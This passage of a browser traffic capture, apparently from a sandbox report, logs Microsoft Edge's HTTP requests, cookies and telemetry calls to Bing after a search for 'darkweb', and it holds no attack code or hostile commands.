HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:04 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306944.7f1f69c
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 21370
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 200

content-length: 1960
content-type: image/svg+xml
content-md5: lOxVXuFtjjXpIAll7kgzvA==
last-modified: Mon, 15 Aug 2022 17:45:21 GMT
etag: 0x8DA7EE5ED1F56FD
x-ms-request-id: 7c27555a-001e-00bb-2c31-c4a084000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.565cda17.1690899375.255be5ab
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
akamai-grn: 0.5d5cda17.1694874810.1afe5694
akamai-grn: 0.b08e1402.1696360426.1b34534
akamai-grn: 0.55281102.1700232259.1839b9d2
akamai-grn: 0.4b281102.1702526738.c0841ccd
akamai-grn: 0.4eba1302.1703096022.4645b734
akamai-grn: 0.4b281102.1704885951.12f50653
cache-control: public, no-transform, max-age=3610975
expires: Thu, 28 Nov 2024 14:34:07 GMT
akamai-grn: 0.98777b5c.1729193472.d5f4202
timing-allow-origin: *
date: Wed, 04 Dec 2024 10:09:04 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306944.7f1f6e5
POST

https://www.bing.com/fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.Hover%22,%22AppNS%22:%22SERP%22,%22K%22:%225559.1%22,%22Name%22:%22VidCaption%22,%22TS%22:1733306935230,%22HType%22:%22h%22,%22FID%22:%22VideoAnswer%22,%22TType%22:0}&log=UserEvent

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.Hover%22,%22AppNS%22:%22SERP%22,%22K%22:%225559.1%22,%22Name%22:%22VidCaption%22,%22TS%22:1733306935230,%22HType%22:%22h%22,%22FID%22:%22VideoAnswer%22,%22TType%22:0}&log=UserEvent HTTP/2.0
host: www.bing.com
content-length: 0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:05 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306945.7f1f983
GET

https://www.bing.com/rp/J_o2maogFDeUOsovPJL-ofEuxJ4.gif

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /rp/J_o2maogFDeUOsovPJL-ofEuxJ4.gif HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:05 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306945.7f1fa91
POST

https://www.bing.com/fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.Hover%22,%22AppNS%22:%22SERP%22,%22K%22:%225560.1%22,%22Name%22:%22VidCaption%22,%22TS%22:1733306935494,%22HType%22:%22h%22,%22FID%22:%22VideoAnswer%22,%22TType%22:0}&log=UserEvent

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.Hover%22,%22AppNS%22:%22SERP%22,%22K%22:%225560.1%22,%22Name%22:%22VidCaption%22,%22TS%22:1733306935494,%22HType%22:%22h%22,%22FID%22:%22VideoAnswer%22,%22TType%22:0}&log=UserEvent HTTP/2.0
host: www.bing.com
content-length: 0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:06 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306946.7f1ff33
GET

https://www.bing.com/rp/NosrlR4amKTs1zYxWy3laZN3HRk.svg

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /rp/NosrlR4amKTs1zYxWy3laZN3HRk.svg HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:07 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306947.7f20626
POST

https://www.bing.com/fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.RichHover.Summary%22,%22AppNS%22:%22SERP%22,%22K%22:%225560.1%22,%22TS%22:1733306936047,%22DU%22:763,%22THLT%22:262,%22RCLT%22:null,%22MOS%22:4717,%22MOT%22:763,%22IsMT%22:1,%22VPST%22:388,%22VDT%22:388,%22MaxVPT%22:763,%22SCNT%22:0,%22MMSTLT%22:null,%22IsMMT%22:0,%22MuteCNT%22:0,%22Mute%22:1,%22IFLT%22:null,%22IFSCT%22:null}&log=UserEvent

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.RichHover.Summary%22,%22AppNS%22:%22SERP%22,%22K%22:%225560.1%22,%22TS%22:1733306936047,%22DU%22:763,%22THLT%22:262,%22RCLT%22:null,%22MOS%22:4717,%22MOT%22:763,%22IsMT%22:1,%22VPST%22:388,%22VDT%22:388,%22MaxVPT%22:763,%22SCNT%22:0,%22MMSTLT%22:null,%22IsMMT%22:0,%22MuteCNT%22:0,%22Mute%22:1,%22IFLT%22:null,%22IFSCT%22:null}&log=UserEvent HTTP/2.0
host: www.bing.com
content-length: 0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
